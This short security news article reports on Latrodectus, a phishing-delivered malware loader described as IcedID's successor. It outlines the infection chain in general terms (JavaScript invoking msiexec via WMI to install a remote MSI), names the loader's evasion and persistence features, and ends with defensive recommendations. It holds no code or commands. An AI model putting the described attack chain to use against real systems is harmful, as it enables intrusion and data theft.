Latrodectus Malware Takes Over IcedID’s Role in Phishing Attacks

Since early March 2024, cybersecurity researchers have detected an increase in email phishing campaigns deploying Latrodectus, a new malware loader believed to be the successor to IcedID.

According to the report, these phishing campaigns usually follow a recognizable infection chain. They start with oversized JavaScript files that exploit WMI’s capability to invoke msiexec.exe, leading to the installation of a remotely-hosted MSI file from a WEBDAV share.

Latrodectus possesses the typical features of malware designed to deploy additional malicious payloads, such as QakBot, DarkGate, and PikaBot, enabling threat actors to execute various post-exploitation activities.

In-depth analysis of Latrodectus artifacts indicates a strong emphasis on enumeration and execution, with the malware incorporating a self-delete function to erase running files.

Moreover, Latrodectus disguises itself as legitimate software libraries and uses source code obfuscation along with anti-analysis checks to evade detection in debugging or sandbox environments.

The malware also establishes persistence on Windows systems by creating a scheduled task and connects to a command-and-control (C2) server over HTTPS. This connection allows Latrodectus to receive commands to gather system information, update, restart, terminate itself, and execute shellcode, DLL, and other executable files.

To protect against Latrodectus malware, it is crucial to implement comprehensive cybersecurity measures. Start by educating employees about phishing scams and the dangers of opening unsolicited email attachments or clicking on unknown links. Deploy advanced endpoint protection and antivirus software that can detect and block suspicious activities. Additionally, configure your network to limit the use of WMI and msiexec.exe where possible, and monitor for unusual behavior that could indicate a breach.